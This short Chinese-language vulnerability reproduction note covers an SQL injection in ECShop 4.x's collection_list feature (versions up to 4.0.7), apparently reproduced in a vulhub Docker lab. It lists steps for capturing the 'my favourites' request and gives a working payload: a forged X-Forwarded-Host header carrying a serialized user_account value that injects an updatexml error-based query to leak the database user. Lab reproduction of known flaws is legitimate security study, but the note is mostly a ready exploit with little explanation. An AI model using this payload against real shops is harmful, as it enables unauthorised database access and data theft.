ECShop是一款B2C独立网店系统,适合企业及个人快速构建个性化网上商店。系统是基于PHP语言及MYSQL数据库构架开发的跨平台开源程序。
漏洞名称
Eecshop 4.x collection_list SQL注入漏洞
影响范围
影响版本:ecshop4.0.7及以下
漏洞成因
参考:Ecshop 4.0 SQL(代码审计从Nday到0day )
环境搭建
从GitHub下载docker文件
https://github.com/vulhub/vulhub/tree/master/ecshop/collection_list-sqli
数据库账户密码 root/root
漏洞复现
注册一个账户后登录
点击 用户中心>我的收藏 抓包
payload:
X-Forwarded-Host: 45ea207d7a2b68c49582d2d22adf953auser_account|a:2:{s:7:"user_id";s:38:"0'-(updatexml(1,repeat(user(),2),1))-'";s:7:"payment";s:1:"4";}|45ea207d7a2b68c49582d2d22adf953a
发包,看回显复现成功。